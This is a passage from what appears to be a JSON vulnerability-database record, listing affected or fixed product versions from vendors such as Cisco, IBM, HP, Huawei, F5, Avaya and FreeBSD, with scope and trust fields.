"debian", "version": "6.0" }, { "model": "big-iq security", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "communicator for android", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0.2" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.9" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "enterprise manager", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "3.1" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.21" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.0" }, { "model": "telepresence ip gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "key", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.2" }, { "model": "worklight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "tivoli netcool/system service monitor fp13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7700" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.1" }, { "model": "operations orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.05" }, { "model": "firepass", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.6" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1" }, { "model": "ddos secure", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "5.14.1-1" }, { "model": "9.3-beta1-p2", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "vsm v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "powervu d9190 comditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "10.0-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "security network intrusion prevention system gx5008", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "softco v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2700\u0026s3700 v100r006c05+v100r06h", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s6800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "telepresence mcu series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asg2000 v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "idp 5.1r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network intrusion prevention system gx4004", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network intrusion prevention system gv1000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "nac manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "db2 connect unlimited advanced edition for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "smc2.0 v100r002c01b017sp17", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.6" }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x1.0.4" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "usg2000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.6" }, { "model": "ecns600 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u19** v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.5" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.20" }, { "model": "oceanstor s5600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x1.0.2" }, { "model": "db2 connect enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "psb email and server security", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "10.00" }, { "model": "toolscenter suite", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.53" }, { "model": "unified communications series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "8.4-release-p12", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "netcool/system service monitor fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.014" }, { "model": "bbm for android", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "0" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.6.0" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "security information and event management hf11", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.3.2" }, { "model": "operations orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.02" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.1" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.12" }, { "model": "tivoli netcool/system service monitor fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "communicator for ipad", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "svn2200 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "db2 connect application server advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "usg9500 v300r001c01spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "8.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "arx", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "ecns610 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "9.2-release-p8", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "protection service for email", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "7.5" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "oceanstor s5600t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace iad v300r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "db2 connect application server edition fp7", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-2" }, { "model": "big-ip wom", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "oceanstor s5800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "security network intrusion prevention system gx4002", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "oceanstor s5800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vdi communicator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0.2" }, { "model": "operations orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.7.4" }, { "model": "icewall sso dfw r3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.7.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.25" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9900" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.0-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.92743" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "tivoli netcool/system service monitor fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.59" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.1" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.6" }, { "model": "elog v100r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.0" }, { "model": "ata series analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "flare experience for ipad", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.2.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "worklight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "9.2-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "db2 enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "db2 connect application server advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.10" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dynamic system analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "s7700\u0026s9700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "freedome for android", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "0" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dsr-1000n 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "simatic wincc oa p002", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "3.12" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.1" }, { "model": "oceanstor s2200t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "icewall sso dfw r1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "db2 advanced enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "db2 express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "security enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "spa232d multi-line dect ata", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "policy center v100r003c00spc305", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v19.7" }, { "model": "solaris", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "11.1.20.5.0" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "ios software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "ios xe software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "10.0-release-p5", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dsr-500n 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip camera", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "spa510 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "idp 4.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.5" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "usg9500 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "prime performance manager for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "s7700\u0026s9700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87100" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "s3900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "collaboration services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "unified communications widgets click to call", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "softco v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence t series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.1" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v310.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "fastsetup", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "flare experience for ipad", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.2" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "db2 connect unlimited edition for system i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-3" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "jabber for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.4" }, { "model": "security network intrusion prevention system gx5208", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "manageone v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.7" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "tivoli netcool/system service monitor fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "s7700\u0026s9700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.2" }, { "model": "point software check point security gateway r77", "scope": null, "trust": 0.3, "vendor": "check", "version": null }, { "model": "s6900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ucs b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.29" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.28" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "big-iq device", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": 